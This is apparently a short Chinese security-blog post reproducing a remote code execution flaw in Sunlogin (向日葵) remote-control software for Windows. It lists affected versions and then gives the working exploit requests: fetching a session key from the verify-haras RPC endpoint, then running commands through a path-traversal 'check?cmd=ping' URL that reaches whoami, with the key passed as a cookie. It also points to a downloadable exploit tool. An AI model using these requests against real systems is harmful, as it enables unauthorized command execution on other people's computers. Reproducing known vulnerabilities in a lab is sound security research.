向日葵RCE复现附脚本
漏洞简介
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
影响范围
向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
开始复现
点击下载存在漏洞的版本
在虚拟机打开向日葵
找到向日葵的监听端口 由于是本地复现 我就直接用 netstat -ano
浏览器访问 http://192.168.2.11:49756/cgi-bin/rpc?action=verify-haras
获取Key
访问 /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami
执行命令
记住最开始的Key要带入Cookie CID=xxxxxxxx
附上工具检测截图
工具下载
解压密码o0
参考链接
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Caps!
评论